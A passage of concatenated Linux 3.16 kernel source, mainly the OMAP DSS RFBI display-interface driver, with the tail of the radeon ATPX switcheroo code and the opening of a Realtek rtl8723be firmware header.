vga_count++;
has_atpx |= (radeon_atpx_pci_probe_handle(pdev) == true);
}
/* some newer PX laptops mark the dGPU as a non-VGA display device */
while ((pdev = pci_get_class(PCI_CLASS_DISPLAY_OTHER << 8, pdev)) != NULL) {
vga_count++;
has_atpx |= (radeon_atpx_pci_probe_handle(pdev) == true);
}
if (has_atpx && vga_count == 2) {
acpi_get_name(radeon_atpx_priv.atpx.handle, ACPI_FULL_PATHNAME, &buffer);
printk(KERN_INFO "VGA switcheroo: detected switching method %s handle\n",
acpi_method_name);
radeon_atpx_priv.atpx_detected = true;
/*
* On some systems hotplug events are generated for the device
* being switched off when ATPX is executed. They cause ACPI
* hotplug to trigger and attempt to remove the device from
* the system, which causes it to break down. Prevent that from
* happening by setting the no_hotplug flag for the involved
* ACPI device objects.
*/
acpi_bus_no_hotplug(radeon_atpx_priv.dhandle);
acpi_bus_no_hotplug(radeon_atpx_priv.other_handle);
return true;
}
return false;
}
/**
* radeon_register_atpx_handler - register with vga_switcheroo
*
* Register the PX callbacks with vga_switcheroo (all asics).
*/
void radeon_register_atpx_handler(void)
{
bool r;
/* detect if we have any ATPX + 2 VGA in the system */
r = radeon_atpx_detect();
if (!r)
return;
vga_switcheroo_register_handler(&radeon_atpx_handler);
}
/**
* radeon_unregister_atpx_handler - unregister with vga_switcheroo
*
* Unregister the PX callbacks with vga_switcheroo (all asics).
*/
void radeon_unregister_atpx_handler(void)
{
vga_switcheroo_unregister_handler();
}
<|start_filename|>linux-3.16/drivers/video/fbdev/omap2/dss/rfbi.c<|end_filename|>
/*
* linux/drivers/video/omap2/dss/rfbi.c
*
* Copyright (C) 2009 Nokia Corporation
* Author: <NAME> <<EMAIL>>
*
* Some code and ideas taken from drivers/video/omap/ driver
* by <NAME>.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published by
* the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* this program. If not, see <http://www.gnu.org/licenses/>.
*/
#define DSS_SUBSYS_NAME "RFBI"
#include <linux/kernel.h>
#include <linux/dma-mapping.h>
#include <linux/export.h>
#include <linux/vmalloc.h>
#include <linux/clk.h>
#include <linux/io.h>
#include <linux/delay.h>
#include <linux/kfifo.h>
#include <linux/ktime.h>
#include <linux/hrtimer.h>
#include <linux/seq_file.h>
#include <linux/semaphore.h>
#include <linux/platform_device.h>
#include <linux/pm_runtime.h>
#include <video/omapdss.h>
#include "dss.h"
struct rfbi_reg { u16 idx; };
#define RFBI_REG(idx) ((const struct rfbi_reg) { idx })
#define RFBI_REVISION RFBI_REG(0x0000)
#define RFBI_SYSCONFIG RFBI_REG(0x0010)
#define RFBI_SYSSTATUS RFBI_REG(0x0014)
#define RFBI_CONTROL RFBI_REG(0x0040)
#define RFBI_PIXEL_CNT RFBI_REG(0x0044)
#define RFBI_LINE_NUMBER RFBI_REG(0x0048)
#define RFBI_CMD RFBI_REG(0x004c)
#define RFBI_PARAM RFBI_REG(0x0050)
#define RFBI_DATA RFBI_REG(0x0054)
#define RFBI_READ RFBI_REG(0x0058)
#define RFBI_STATUS RFBI_REG(0x005c)
#define RFBI_CONFIG(n) RFBI_REG(0x0060 + (n)*0x18)
#define RFBI_ONOFF_TIME(n) RFBI_REG(0x0064 + (n)*0x18)
#define RFBI_CYCLE_TIME(n) RFBI_REG(0x0068 + (n)*0x18)
#define RFBI_DATA_CYCLE1(n) RFBI_REG(0x006c + (n)*0x18)
#define RFBI_DATA_CYCLE2(n) RFBI_REG(0x0070 + (n)*0x18)
#define RFBI_DATA_CYCLE3(n) RFBI_REG(0x0074 + (n)*0x18)
#define RFBI_VSYNC_WIDTH RFBI_REG(0x0090)
#define RFBI_HSYNC_WIDTH RFBI_REG(0x0094)
#define REG_FLD_MOD(idx, val, start, end) \
rfbi_write_reg(idx, FLD_MOD(rfbi_read_reg(idx), val, start, end))
enum omap_rfbi_cycleformat {
OMAP_DSS_RFBI_CYCLEFORMAT_1_1 = 0,
OMAP_DSS_RFBI_CYCLEFORMAT_2_1 = 1,
OMAP_DSS_RFBI_CYCLEFORMAT_3_1 = 2,
OMAP_DSS_RFBI_CYCLEFORMAT_3_2 = 3,
};
enum omap_rfbi_datatype {
OMAP_DSS_RFBI_DATATYPE_12 = 0,
OMAP_DSS_RFBI_DATATYPE_16 = 1,
OMAP_DSS_RFBI_DATATYPE_18 = 2,
OMAP_DSS_RFBI_DATATYPE_24 = 3,
};
enum omap_rfbi_parallelmode {
OMAP_DSS_RFBI_PARALLELMODE_8 = 0,
OMAP_DSS_RFBI_PARALLELMODE_9 = 1,
OMAP_DSS_RFBI_PARALLELMODE_12 = 2,
OMAP_DSS_RFBI_PARALLELMODE_16 = 3,
};
static int rfbi_convert_timings(struct rfbi_timings *t);
static void rfbi_get_clk_info(u32 *clk_period, u32 *max_clk_div);
static struct {
struct platform_device *pdev;
void __iomem *base;
unsigned long l4_khz;
enum omap_rfbi_datatype datatype;
enum omap_rfbi_parallelmode parallelmode;
enum omap_rfbi_te_mode te_mode;
int te_enabled;
void (*framedone_callback)(void *data);
void *framedone_callback_data;
struct omap_dss_device *dssdev[2];
struct semaphore bus_lock;
struct omap_video_timings timings;
int pixel_size;
int data_lines;
struct rfbi_timings intf_timings;
struct omap_dss_device output;
} rfbi;
static inline void rfbi_write_reg(const struct rfbi_reg idx, u32 val)
{
__raw_writel(val, rfbi.base + idx.idx);
}
static inline u32 rfbi_read_reg(const struct rfbi_reg idx)
{
return __raw_readl(rfbi.base + idx.idx);
}
static int rfbi_runtime_get(void)
{
int r;
DSSDBG("rfbi_runtime_get\n");
r = pm_runtime_get_sync(&rfbi.pdev->dev);
WARN_ON(r < 0);
return r < 0 ? r : 0;
}
static void rfbi_runtime_put(void)
{
int r;
DSSDBG("rfbi_runtime_put\n");
r = pm_runtime_put_sync(&rfbi.pdev->dev);
WARN_ON(r < 0 && r != -ENOSYS);
}
static void rfbi_bus_lock(void)
{
down(&rfbi.bus_lock);
}
static void rfbi_bus_unlock(void)
{
up(&rfbi.bus_lock);
}
static void rfbi_write_command(const void *buf, u32 len)
{
switch (rfbi.parallelmode) {
case OMAP_DSS_RFBI_PARALLELMODE_8:
{
const u8 *b = buf;
for (; len; len--)
rfbi_write_reg(RFBI_CMD, *b++);
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_16:
{
const u16 *w = buf;
BUG_ON(len & 1);
for (; len; len -= 2)
rfbi_write_reg(RFBI_CMD, *w++);
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_9:
case OMAP_DSS_RFBI_PARALLELMODE_12:
default:
BUG();
}
}
static void rfbi_read_data(void *buf, u32 len)
{
switch (rfbi.parallelmode) {
case OMAP_DSS_RFBI_PARALLELMODE_8:
{
u8 *b = buf;
for (; len; len--) {
rfbi_write_reg(RFBI_READ, 0);
*b++ = rfbi_read_reg(RFBI_READ);
}
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_16:
{
u16 *w = buf;
BUG_ON(len & ~1);
for (; len; len -= 2) {
rfbi_write_reg(RFBI_READ, 0);
*w++ = rfbi_read_reg(RFBI_READ);
}
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_9:
case OMAP_DSS_RFBI_PARALLELMODE_12:
default:
BUG();
}
}
static void rfbi_write_data(const void *buf, u32 len)
{
switch (rfbi.parallelmode) {
case OMAP_DSS_RFBI_PARALLELMODE_8:
{
const u8 *b = buf;
for (; len; len--)
rfbi_write_reg(RFBI_PARAM, *b++);
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_16:
{
const u16 *w = buf;
BUG_ON(len & 1);
for (; len; len -= 2)
rfbi_write_reg(RFBI_PARAM, *w++);
break;
}
case OMAP_DSS_RFBI_PARALLELMODE_9:
case OMAP_DSS_RFBI_PARALLELMODE_12:
default:
BUG();
}
}
static void rfbi_write_pixels(const void __iomem *buf, int scr_width,
u16 x, u16 y,
u16 w, u16 h)
{
int start_offset = scr_width * y + x;
int horiz_offset = scr_width - w;
int i;
if (rfbi.datatype == OMAP_DSS_RFBI_DATATYPE_16 &&
rfbi.parallelmode == OMAP_DSS_RFBI_PARALLELMODE_8) {
const u16 __iomem *pd = buf;
pd += start_offset;
for (; h; --h) {
for (i = 0; i < w; ++i) {
const u8 __iomem *b = (const u8 __iomem *)pd;
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+1));
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+0));
++pd;
}
pd += horiz_offset;
}
} else if (rfbi.datatype == OMAP_DSS_RFBI_DATATYPE_24 &&
rfbi.parallelmode == OMAP_DSS_RFBI_PARALLELMODE_8) {
const u32 __iomem *pd = buf;
pd += start_offset;
for (; h; --h) {
for (i = 0; i < w; ++i) {
const u8 __iomem *b = (const u8 __iomem *)pd;
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+2));
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+1));
rfbi_write_reg(RFBI_PARAM, __raw_readb(b+0));
++pd;
}
pd += horiz_offset;
}
} else if (rfbi.datatype == OMAP_DSS_RFBI_DATATYPE_16 &&
rfbi.parallelmode == OMAP_DSS_RFBI_PARALLELMODE_16) {
const u16 __iomem *pd = buf;
pd += start_offset;
for (; h; --h) {
for (i = 0; i < w; ++i) {
rfbi_write_reg(RFBI_PARAM, __raw_readw(pd));
++pd;
}
pd += horiz_offset;
}
} else {
BUG();
}
}
static int rfbi_transfer_area(struct omap_dss_device *dssdev,
void (*callback)(void *data), void *data)
{
u32 l;
int r;
struct omap_overlay_manager *mgr = rfbi.output.manager;
u16 width = rfbi.timings.x_res;
u16 height = rfbi.timings.y_res;
/*BUG_ON(callback == 0);*/
BUG_ON(rfbi.framedone_callback != NULL);
DSSDBG("rfbi_transfer_area %dx%d\n", width, height);
dss_mgr_set_timings(mgr, &rfbi.timings);
r = dss_mgr_enable(mgr);
if (r)
return r;
rfbi.framedone_callback = callback;
rfbi.framedone_callback_data = data;
rfbi_write_reg(RFBI_PIXEL_CNT, width * height);
l = rfbi_read_reg(RFBI_CONTROL);
l = FLD_MOD(l, 1, 0, 0); /* enable */
if (!rfbi.te_enabled)
l = FLD_MOD(l, 1, 4, 4); /* ITE */
rfbi_write_reg(RFBI_CONTROL, l);
return 0;
}
static void framedone_callback(void *data)
{
void (*callback)(void *data);
DSSDBG("FRAMEDONE\n");
REG_FLD_MOD(RFBI_CONTROL, 0, 0, 0);
callback = rfbi.framedone_callback;
rfbi.framedone_callback = NULL;
if (callback != NULL)
callback(rfbi.framedone_callback_data);
}
#if 1 /* VERBOSE */
static void rfbi_print_timings(void)
{
u32 l;
u32 time;
l = rfbi_read_reg(RFBI_CONFIG(0));
time = 1000000000 / rfbi.l4_khz;
if (l & (1 << 4))
time *= 2;
DSSDBG("Tick time %u ps\n", time);
l = rfbi_read_reg(RFBI_ONOFF_TIME(0));
DSSDBG("CSONTIME %d, CSOFFTIME %d, WEONTIME %d, WEOFFTIME %d, "
"REONTIME %d, REOFFTIME %d\n",
l & 0x0f, (l >> 4) & 0x3f, (l >> 10) & 0x0f, (l >> 14) & 0x3f,
(l >> 20) & 0x0f, (l >> 24) & 0x3f);
l = rfbi_read_reg(RFBI_CYCLE_TIME(0));
DSSDBG("WECYCLETIME %d, RECYCLETIME %d, CSPULSEWIDTH %d, "
"ACCESSTIME %d\n",
(l & 0x3f), (l >> 6) & 0x3f, (l >> 12) & 0x3f,
(l >> 22) & 0x3f);
}
#else
static void rfbi_print_timings(void) {}
#endif
static u32 extif_clk_period;
static inline unsigned long round_to_extif_ticks(unsigned long ps, int div)
{
int bus_tick = extif_clk_period * div;
return (ps + bus_tick - 1) / bus_tick * bus_tick;
}
static int calc_reg_timing(struct rfbi_timings *t, int div)
{
t->clk_div = div;
t->cs_on_time = round_to_extif_ticks(t->cs_on_time, div);
t->we_on_time = round_to_extif_ticks(t->we_on_time, div);
t->we_off_time = round_to_extif_ticks(t->we_off_time, div);
t->we_cycle_time = round_to_extif_ticks(t->we_cycle_time, div);
t->re_on_time = round_to_extif_ticks(t->re_on_time, div);
t->re_off_time = round_to_extif_ticks(t->re_off_time, div);
t->re_cycle_time = round_to_extif_ticks(t->re_cycle_time, div);
t->access_time = round_to_extif_ticks(t->access_time, div);
t->cs_off_time = round_to_extif_ticks(t->cs_off_time, div);
t->cs_pulse_width = round_to_extif_ticks(t->cs_pulse_width, div);
DSSDBG("[reg]cson %d csoff %d reon %d reoff %d\n",
t->cs_on_time, t->cs_off_time, t->re_on_time, t->re_off_time);
DSSDBG("[reg]weon %d weoff %d recyc %d wecyc %d\n",
t->we_on_time, t->we_off_time, t->re_cycle_time,
t->we_cycle_time);
DSSDBG("[reg]rdaccess %d cspulse %d\n",
t->access_time, t->cs_pulse_width);
return rfbi_convert_timings(t);
}
static int calc_extif_timings(struct rfbi_timings *t)
{
u32 max_clk_div;
int div;
rfbi_get_clk_info(&extif_clk_period, &max_clk_div);
for (div = 1; div <= max_clk_div; div++) {
if (calc_reg_timing(t, div) == 0)
break;
}
if (div <= max_clk_div)
return 0;
DSSERR("can't setup timings\n");
return -1;
}
static void rfbi_set_timings(int rfbi_module, struct rfbi_timings *t)
{
int r;
if (!t->converted) {
r = calc_extif_timings(t);
if (r < 0)
DSSERR("Failed to calc timings\n");
}
BUG_ON(!t->converted);
rfbi_write_reg(RFBI_ONOFF_TIME(rfbi_module), t->tim[0]);
rfbi_write_reg(RFBI_CYCLE_TIME(rfbi_module), t->tim[1]);
/* TIMEGRANULARITY */
REG_FLD_MOD(RFBI_CONFIG(rfbi_module),
(t->tim[2] ? 1 : 0), 4, 4);
rfbi_print_timings();
}
static int ps_to_rfbi_ticks(int time, int div)
{
unsigned long tick_ps;
int ret;
/* Calculate in picosecs to yield more exact results */
tick_ps = 1000000000 / (rfbi.l4_khz) * div;
ret = (time + tick_ps - 1) / tick_ps;
return ret;
}
static void rfbi_get_clk_info(u32 *clk_period, u32 *max_clk_div)
{
*clk_period = 1000000000 / rfbi.l4_khz;
*max_clk_div = 2;
}
static int rfbi_convert_timings(struct rfbi_timings *t)
{
u32 l;
int reon, reoff, weon, weoff, cson, csoff, cs_pulse;
int actim, recyc, wecyc;
int div = t->clk_div;
if (div <= 0 || div > 2)
return -1;
/* Make sure that after conversion it still holds that:
* weoff > weon, reoff > reon, recyc >= reoff, wecyc >= weoff,
* csoff > cson, csoff >= max(weoff, reoff), actim > reon
*/
weon = ps_to_rfbi_ticks(t->we_on_time, div);
weoff = ps_to_rfbi_ticks(t->we_off_time, div);
if (weoff <= weon)
weoff = weon + 1;
if (weon > 0x0f)
return -1;
if (weoff > 0x3f)
return -1;
reon = ps_to_rfbi_ticks(t->re_on_time, div);
reoff = ps_to_rfbi_ticks(t->re_off_time, div);
if (reoff <= reon)
reoff = reon + 1;
if (reon > 0x0f)
return -1;
if (reoff > 0x3f)
return -1;
cson = ps_to_rfbi_ticks(t->cs_on_time, div);
csoff = ps_to_rfbi_ticks(t->cs_off_time, div);
if (csoff <= cson)
csoff = cson + 1;
if (csoff < max(weoff, reoff))
csoff = max(weoff, reoff);
if (cson > 0x0f)
return -1;
if (csoff > 0x3f)
return -1;
l = cson;
l |= csoff << 4;
l |= weon << 10;
l |= weoff << 14;
l |= reon << 20;
l |= reoff << 24;
t->tim[0] = l;
actim = ps_to_rfbi_ticks(t->access_time, div);
if (actim <= reon)
actim = reon + 1;
if (actim > 0x3f)
return -1;
wecyc = ps_to_rfbi_ticks(t->we_cycle_time, div);
if (wecyc < weoff)
wecyc = weoff;
if (wecyc > 0x3f)
return -1;
recyc = ps_to_rfbi_ticks(t->re_cycle_time, div);
if (recyc < reoff)
recyc = reoff;
if (recyc > 0x3f)
return -1;
cs_pulse = ps_to_rfbi_ticks(t->cs_pulse_width, div);
if (cs_pulse > 0x3f)
return -1;
l = wecyc;
l |= recyc << 6;
l |= cs_pulse << 12;
l |= actim << 22;
t->tim[1] = l;
t->tim[2] = div - 1;
t->converted = 1;
return 0;
}
/* xxx FIX module selection missing */
static int rfbi_setup_te(enum omap_rfbi_te_mode mode,
unsigned hs_pulse_time, unsigned vs_pulse_time,
int hs_pol_inv, int vs_pol_inv, int extif_div)
{
int hs, vs;
int min;
u32 l;
hs = ps_to_rfbi_ticks(hs_pulse_time, 1);
vs = ps_to_rfbi_ticks(vs_pulse_time, 1);
if (hs < 2)
return -EDOM;
if (mode == OMAP_DSS_RFBI_TE_MODE_2)
min = 2;
else /* OMAP_DSS_RFBI_TE_MODE_1 */
min = 4;
if (vs < min)
return -EDOM;
if (vs == hs)
return -EINVAL;
rfbi.te_mode = mode;
DSSDBG("setup_te: mode %d hs %d vs %d hs_inv %d vs_inv %d\n",
mode, hs, vs, hs_pol_inv, vs_pol_inv);
rfbi_write_reg(RFBI_HSYNC_WIDTH, hs);
rfbi_write_reg(RFBI_VSYNC_WIDTH, vs);
l = rfbi_read_reg(RFBI_CONFIG(0));
if (hs_pol_inv)
l &= ~(1 << 21);
else
l |= 1 << 21;
if (vs_pol_inv)
l &= ~(1 << 20);
else
l |= 1 << 20;
return 0;
}
/* xxx FIX module selection missing */
static int rfbi_enable_te(bool enable, unsigned line)
{
u32 l;
DSSDBG("te %d line %d mode %d\n", enable, line, rfbi.te_mode);
if (line > (1 << 11) - 1)
return -EINVAL;
l = rfbi_read_reg(RFBI_CONFIG(0));
l &= ~(0x3 << 2);
if (enable) {
rfbi.te_enabled = 1;
l |= rfbi.te_mode << 2;
} else
rfbi.te_enabled = 0;
rfbi_write_reg(RFBI_CONFIG(0), l);
rfbi_write_reg(RFBI_LINE_NUMBER, line);
return 0;
}
static int rfbi_configure_bus(int rfbi_module, int bpp, int lines)
{
u32 l;
int cycle1 = 0, cycle2 = 0, cycle3 = 0;
enum omap_rfbi_cycleformat cycleformat;
enum omap_rfbi_datatype datatype;
enum omap_rfbi_parallelmode parallelmode;
switch (bpp) {
case 12:
datatype = OMAP_DSS_RFBI_DATATYPE_12;
break;
case 16:
datatype = OMAP_DSS_RFBI_DATATYPE_16;
break;
case 18:
datatype = OMAP_DSS_RFBI_DATATYPE_18;
break;
case 24:
datatype = OMAP_DSS_RFBI_DATATYPE_24;
break;
default:
BUG();
return 1;
}
rfbi.datatype = datatype;
switch (lines) {
case 8:
parallelmode = OMAP_DSS_RFBI_PARALLELMODE_8;
break;
case 9:
parallelmode = OMAP_DSS_RFBI_PARALLELMODE_9;
break;
case 12:
parallelmode = OMAP_DSS_RFBI_PARALLELMODE_12;
break;
case 16:
parallelmode = OMAP_DSS_RFBI_PARALLELMODE_16;
break;
default:
BUG();
return 1;
}
rfbi.parallelmode = parallelmode;
if ((bpp % lines) == 0) {
switch (bpp / lines) {
case 1:
cycleformat = OMAP_DSS_RFBI_CYCLEFORMAT_1_1;
break;
case 2:
cycleformat = OMAP_DSS_RFBI_CYCLEFORMAT_2_1;
break;
case 3:
cycleformat = OMAP_DSS_RFBI_CYCLEFORMAT_3_1;
break;
default:
BUG();
return 1;
}
} else if ((2 * bpp % lines) == 0) {
if ((2 * bpp / lines) == 3)
cycleformat = OMAP_DSS_RFBI_CYCLEFORMAT_3_2;
else {
BUG();
return 1;
}
} else {
BUG();
return 1;
}
switch (cycleformat) {
case OMAP_DSS_RFBI_CYCLEFORMAT_1_1:
cycle1 = lines;
break;
case OMAP_DSS_RFBI_CYCLEFORMAT_2_1:
cycle1 = lines;
cycle2 = lines;
break;
case OMAP_DSS_RFBI_CYCLEFORMAT_3_1:
cycle1 = lines;
cycle2 = lines;
cycle3 = lines;
break;
case OMAP_DSS_RFBI_CYCLEFORMAT_3_2:
cycle1 = lines;
cycle2 = (lines / 2) | ((lines / 2) << 16);
cycle3 = (lines << 16);
break;
}
REG_FLD_MOD(RFBI_CONTROL, 0, 3, 2); /* clear CS */
l = 0;
l |= FLD_VAL(parallelmode, 1, 0);
l |= FLD_VAL(0, 3, 2); /* TRIGGERMODE: ITE */
l |= FLD_VAL(0, 4, 4); /* TIMEGRANULARITY */
l |= FLD_VAL(datatype, 6, 5);
/* l |= FLD_VAL(2, 8, 7); */ /* L4FORMAT, 2pix/L4 */
l |= FLD_VAL(0, 8, 7); /* L4FORMAT, 1pix/L4 */
l |= FLD_VAL(cycleformat, 10, 9);
l |= FLD_VAL(0, 12, 11); /* UNUSEDBITS */
l |= FLD_VAL(0, 16, 16); /* A0POLARITY */
l |= FLD_VAL(0, 17, 17); /* REPOLARITY */
l |= FLD_VAL(0, 18, 18); /* WEPOLARITY */
l |= FLD_VAL(0, 19, 19); /* CSPOLARITY */
l |= FLD_VAL(1, 20, 20); /* TE_VSYNC_POLARITY */
l |= FLD_VAL(1, 21, 21); /* HSYNCPOLARITY */
rfbi_write_reg(RFBI_CONFIG(rfbi_module), l);
rfbi_write_reg(RFBI_DATA_CYCLE1(rfbi_module), cycle1);
rfbi_write_reg(RFBI_DATA_CYCLE2(rfbi_module), cycle2);
rfbi_write_reg(RFBI_DATA_CYCLE3(rfbi_module), cycle3);
l = rfbi_read_reg(RFBI_CONTROL);
l = FLD_MOD(l, rfbi_module+1, 3, 2); /* Select CSx */
l = FLD_MOD(l, 0, 1, 1); /* clear bypass */
rfbi_write_reg(RFBI_CONTROL, l);
DSSDBG("RFBI config: bpp %d, lines %d, cycles: 0x%x 0x%x 0x%x\n",
bpp, lines, cycle1, cycle2, cycle3);
return 0;
}
static int rfbi_configure(struct omap_dss_device *dssdev)
{
return rfbi_configure_bus(dssdev->phy.rfbi.channel, rfbi.pixel_size,
rfbi.data_lines);
}
static int rfbi_update(struct omap_dss_device *dssdev, void (*callback)(void *),
void *data)
{
return rfbi_transfer_area(dssdev, callback, data);
}
static void rfbi_set_size(struct omap_dss_device *dssdev, u16 w, u16 h)
{
rfbi.timings.x_res = w;
rfbi.timings.y_res = h;
}
static void rfbi_set_pixel_size(struct omap_dss_device *dssdev, int pixel_size)
{
rfbi.pixel_size = pixel_size;
}
static void rfbi_set_data_lines(struct omap_dss_device *dssdev, int data_lines)
{
rfbi.data_lines = data_lines;
}
static void rfbi_set_interface_timings(struct omap_dss_device *dssdev,
struct rfbi_timings *timings)
{
rfbi.intf_timings = *timings;
}
static void rfbi_dump_regs(struct seq_file *s)
{
#define DUMPREG(r) seq_printf(s, "%-35s %08x\n", #r, rfbi_read_reg(r))
if (rfbi_runtime_get())
return;
DUMPREG(RFBI_REVISION);
DUMPREG(RFBI_SYSCONFIG);
DUMPREG(RFBI_SYSSTATUS);
DUMPREG(RFBI_CONTROL);
DUMPREG(RFBI_PIXEL_CNT);
DUMPREG(RFBI_LINE_NUMBER);
DUMPREG(RFBI_CMD);
DUMPREG(RFBI_PARAM);
DUMPREG(RFBI_DATA);
DUMPREG(RFBI_READ);
DUMPREG(RFBI_STATUS);
DUMPREG(RFBI_CONFIG(0));
DUMPREG(RFBI_ONOFF_TIME(0));
DUMPREG(RFBI_CYCLE_TIME(0));
DUMPREG(RFBI_DATA_CYCLE1(0));
DUMPREG(RFBI_DATA_CYCLE2(0));
DUMPREG(RFBI_DATA_CYCLE3(0));
DUMPREG(RFBI_CONFIG(1));
DUMPREG(RFBI_ONOFF_TIME(1));
DUMPREG(RFBI_CYCLE_TIME(1));
DUMPREG(RFBI_DATA_CYCLE1(1));
DUMPREG(RFBI_DATA_CYCLE2(1));
DUMPREG(RFBI_DATA_CYCLE3(1));
DUMPREG(RFBI_VSYNC_WIDTH);
DUMPREG(RFBI_HSYNC_WIDTH);
rfbi_runtime_put();
#undef DUMPREG
}
static void rfbi_config_lcd_manager(struct omap_dss_device *dssdev)
{
struct omap_overlay_manager *mgr = rfbi.output.manager;
struct dss_lcd_mgr_config mgr_config;
mgr_config.io_pad_mode = DSS_IO_PAD_MODE_RFBI;
mgr_config.stallmode = true;
/* Do we need fifohandcheck for RFBI? */
mgr_config.fifohandcheck = false;
mgr_config.video_port_width = rfbi.pixel_size;
mgr_config.lcden_sig_polarity = 0;
dss_mgr_set_lcd_config(mgr, &mgr_config);
/*
* Set rfbi.timings with default values, the x_res and y_res fields
* are expected to be already configured by the panel driver via
* omapdss_rfbi_set_size()
*/
rfbi.timings.hsw = 1;
rfbi.timings.hfp = 1;
rfbi.timings.hbp = 1;
rfbi.timings.vsw = 1;
rfbi.timings.vfp = 0;
rfbi.timings.vbp = 0;
rfbi.timings.interlace = false;
rfbi.timings.hsync_level = OMAPDSS_SIG_ACTIVE_HIGH;
rfbi.timings.vsync_level = OMAPDSS_SIG_ACTIVE_HIGH;
rfbi.timings.data_pclk_edge = OMAPDSS_DRIVE_SIG_RISING_EDGE;
rfbi.timings.de_level = OMAPDSS_SIG_ACTIVE_HIGH;
rfbi.timings.sync_pclk_edge = OMAPDSS_DRIVE_SIG_OPPOSITE_EDGES;
dss_mgr_set_timings(mgr, &rfbi.timings);
}
static int rfbi_display_enable(struct omap_dss_device *dssdev)
{
struct omap_dss_device *out = &rfbi.output;
int r;
if (out == NULL || out->manager == NULL) {
DSSERR("failed to enable display: no output/manager\n");
return -ENODEV;
}
r = rfbi_runtime_get();
if (r)
return r;
r = dss_mgr_register_framedone_handler(out->manager,
framedone_callback, NULL);
if (r) {
DSSERR("can't get FRAMEDONE irq\n");
goto err1;
}
rfbi_config_lcd_manager(dssdev);
rfbi_configure_bus(dssdev->phy.rfbi.channel, rfbi.pixel_size,
rfbi.data_lines);
rfbi_set_timings(dssdev->phy.rfbi.channel, &rfbi.intf_timings);
return 0;
err1:
rfbi_runtime_put();
return r;
}
static void rfbi_display_disable(struct omap_dss_device *dssdev)
{
struct omap_dss_device *out = &rfbi.output;
dss_mgr_unregister_framedone_handler(out->manager,
framedone_callback, NULL);
rfbi_runtime_put();
}
static int rfbi_init_display(struct omap_dss_device *dssdev)
{
rfbi.dssdev[dssdev->phy.rfbi.channel] = dssdev;
return 0;
}
static void rfbi_init_output(struct platform_device *pdev)
{
struct omap_dss_device *out = &rfbi.output;
out->dev = &pdev->dev;
out->id = OMAP_DSS_OUTPUT_DBI;
out->output_type = OMAP_DISPLAY_TYPE_DBI;
out->name = "rfbi.0";
out->dispc_channel = OMAP_DSS_CHANNEL_LCD;
out->owner = THIS_MODULE;
omapdss_register_output(out);
}
static void __exit rfbi_uninit_output(struct platform_device *pdev)
{
struct omap_dss_device *out = &rfbi.output;
omapdss_unregister_output(out);
}
/* RFBI HW IP initialisation */
static int omap_rfbihw_probe(struct platform_device *pdev)
{
u32 rev;
struct resource *rfbi_mem;
struct clk *clk;
int r;
rfbi.pdev = pdev;
sema_init(&rfbi.bus_lock, 1);
rfbi_mem = platform_get_resource(rfbi.pdev, IORESOURCE_MEM, 0);
if (!rfbi_mem) {
DSSERR("can't get IORESOURCE_MEM RFBI\n");
return -EINVAL;
}
rfbi.base = devm_ioremap(&pdev->dev, rfbi_mem->start,
resource_size(rfbi_mem));
if (!rfbi.base) {
DSSERR("can't ioremap RFBI\n");
return -ENOMEM;
}
clk = clk_get(&pdev->dev, "ick");
if (IS_ERR(clk)) {
DSSERR("can't get ick\n");
return PTR_ERR(clk);
}
rfbi.l4_khz = clk_get_rate(clk) / 1000;
clk_put(clk);
pm_runtime_enable(&pdev->dev);
r = rfbi_runtime_get();
if (r)
goto err_runtime_get;
msleep(10);
rev = rfbi_read_reg(RFBI_REVISION);
dev_dbg(&pdev->dev, "OMAP RFBI rev %d.%d\n",
FLD_GET(rev, 7, 4), FLD_GET(rev, 3, 0));
rfbi_runtime_put();
dss_debugfs_create_file("rfbi", rfbi_dump_regs);
rfbi_init_output(pdev);
return 0;
err_runtime_get:
pm_runtime_disable(&pdev->dev);
return r;
}
static int __exit omap_rfbihw_remove(struct platform_device *pdev)
{
rfbi_uninit_output(pdev);
pm_runtime_disable(&pdev->dev);
return 0;
}
static int rfbi_runtime_suspend(struct device *dev)
{
dispc_runtime_put();
return 0;
}
static int rfbi_runtime_resume(struct device *dev)
{
int r;
r = dispc_runtime_get();
if (r < 0)
return r;
return 0;
}
static const struct dev_pm_ops rfbi_pm_ops = {
.runtime_suspend = rfbi_runtime_suspend,
.runtime_resume = rfbi_runtime_resume,
};
static struct platform_driver omap_rfbihw_driver = {
.probe = omap_rfbihw_probe,
.remove = __exit_p(omap_rfbihw_remove),
.driver = {
.name = "omapdss_rfbi",
.owner = THIS_MODULE,
.pm = &rfbi_pm_ops,
},
};
int __init rfbi_init_platform_driver(void)
{
return platform_driver_register(&omap_rfbihw_driver);
}
void __exit rfbi_uninit_platform_driver(void)
{
platform_driver_unregister(&omap_rfbihw_driver);
}
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/fw.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL8723BE__FW__H__
#define __RTL8723BE__FW__H__
#define FW_8192C_SIZE 0x8000
#define FW_8192C_START_ADDRESS 0x1000
#define FW_8192C_END_ADDRESS 0x5FFF
#define FW_8192C_PAGE_SIZE 4096
#define FW_8192C_POLLING_DELAY 5
